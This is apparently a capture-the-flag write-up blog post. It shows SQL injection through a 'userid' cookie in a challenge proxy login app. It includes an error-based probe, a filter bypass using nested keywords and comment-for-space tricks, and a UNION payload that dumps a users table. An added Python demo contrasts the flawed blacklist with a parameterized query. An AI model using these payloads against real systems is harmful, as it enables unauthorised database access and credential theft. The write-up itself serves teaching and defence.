You can download the complete challenge VM from here. They have also provided an online version of the first two levels, and I was interested in having a look at it: http://cloaknet.csc.kth.se:8080/proxy.jsp
There is a login page, and our goal is to extract all the usernames and passwords from the database.
If you try injecting the login form, none of the injections work. But there is a link labelled “No account?”, and when you click it you get this message.
After logging in with demo:demo we are taken to “proxypanel.jsp”, which displays source, target and date.
Let’s analyze this using Burp. First, when we log in, this is the POST request. Notice that the request is being made to the “proxy.jsp” page.
[code language="sql"]
user=demo&pass=demo&login=1
&token=17312256995467290477108424856116888064446348101932685808552243140
&asd=Login
[/code]
Too bad the web app is using tokens: this means we cannot simply replay the request to experiment.
After forwarding the request, another GET request is made to “proxypanel.jsp”, the actual page where we land. Here the cookie values are passed.
Let’s have a look at the cookies.
There are two cookies, JSESSIONID and userid. Let’s mutate the userid parameter and check the output: userid=71934"\;
Aha!
[code language="sql"]
com.mysql.jdbc.exceptions.jdbc4.MySQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MySQL
server version for the right syntax to use near '"' at line 1
[/code]
After counting the columns I got 3. You cannot just inject here, because there is a filter: from what I noticed, keywords such as union and select, as well as spaces, are being filtered. To bypass the space filter I used comments (/**/), and to bypass the keyword filter I used UNunionION and SELselectECT. However, when I tried giving 1,2,3 I got the error “The used SELECT statements have a different number of columns”.
Our target is to dump the usernames and passwords, but userid is a column in a different table from the one we want. I just guessed there should be a table named “users” and tried this query.
[code language="sql"]
-71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users
[/code]
w00t! Here we go 🙂
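To show why the filter above fails and what the fix looks like, here is an added example that is not part of the original write-up or the challenge VM. It reconstructs a blacklist of the kind the post infers (drop union, select and spaces, each keyword once and case-insensitively), runs the post’s probe and final payload against a constructed in-memory SQLite database standing in for the MySQL backend (SQLite accepts /**/ comments and UNION the same way for this purpose), and contrasts the concatenated query with an allowlisted, parameterized one. The schema, table contents, filter logic and the functions naive_filter, lookup_vulnerable, query_error and lookup_safe are all assumptions made for the demonstration.

```python
import re
import sqlite3

# Constructed stand-in for the challenge database (not the VM's real schema).
# The panel query returns three columns (source, target, date) and the guessed
# "users" table also has three, which is why "select *" lines up with the UNION
# while a hand-written column list can trip a column-count mismatch.
SCHEMA = """
CREATE TABLE sessions (userid INTEGER, source TEXT, target TEXT, date TEXT);
INSERT INTO sessions VALUES (71934, '10.0.0.5', 'example.test', '2013-01-01');
CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'demo', 'demo');
INSERT INTO users VALUES (2, 'admin', 'placeholder-secret');
"""

PROBE = '71934"\\;'          # the syntax-error probe from the write-up
PAYLOAD = "-71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users"


def open_db():
    """In-memory SQLite database loaded with the constructed sample data."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def naive_filter(value):
    """Blacklist of the kind the write-up infers (hypothetical reconstruction):
    'union', 'select' and spaces are stripped, each keyword only once and
    case-insensitively, so a keyword spliced into itself survives."""
    for word in ("union", "select"):
        value = re.sub(word, "", value, count=1, flags=re.IGNORECASE)
    return value.replace(" ", "")


def lookup_vulnerable(conn, userid_cookie):
    """Cookie value concatenated into the query after the blacklist.
    Returns whatever rows the (possibly rewritten) query produces."""
    cleaned = naive_filter(userid_cookie)
    sql = "SELECT source, target, date FROM sessions WHERE userid = " + cleaned
    return conn.execute(sql).fetchall()


def query_error(conn, userid_cookie):
    """Name of the database error a cookie value triggers, or None.
    A verbose error page like the one in the write-up is what confirms the
    value reaches the SQL parser; log it server-side and show a generic page."""
    try:
        lookup_vulnerable(conn, userid_cookie)
        return None
    except sqlite3.Error as exc:
        return type(exc).__name__


def lookup_safe(conn, userid_cookie):
    """Allowlist the shape of the id, then bind it as a parameter. The value
    is data to the driver, never SQL syntax, so no keyword filter is needed."""
    if not re.fullmatch(r"[0-9]{1,10}", userid_cookie):
        raise ValueError("userid cookie is not a numeric id")
    sql = "SELECT source, target, date FROM sessions WHERE userid = ?"
    return conn.execute(sql, (int(userid_cookie),)).fetchall()


if __name__ == "__main__":
    db = open_db()
    print("filter output:", naive_filter(PAYLOAD))
    print("probe error  :", query_error(db, PROBE))
    print("vulnerable   :", lookup_vulnerable(db, PAYLOAD))
    try:
        lookup_safe(db, PAYLOAD)
    except ValueError as err:
        print("safe         :", err)
    print("safe (normal):", lookup_safe(db, "71934"))
```

The point of the side-by-side is that the blacklist is not the defence: after one pass the filter hands the parser a clean `union ... select`, whereas the parameterized version never lets the cookie become syntax at all, and the numeric allowlist on top gives a cheap signal to log when a cookie stops looking like an id.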
Thanks for reading.
Cool challenge, thanks for the clean solution 🙂
😀 Ya, this is a very nice challenge. Thanks for your solution bro 😀
Good write-up of the first part, but that’s not the end of the challenge... there is much more to this one...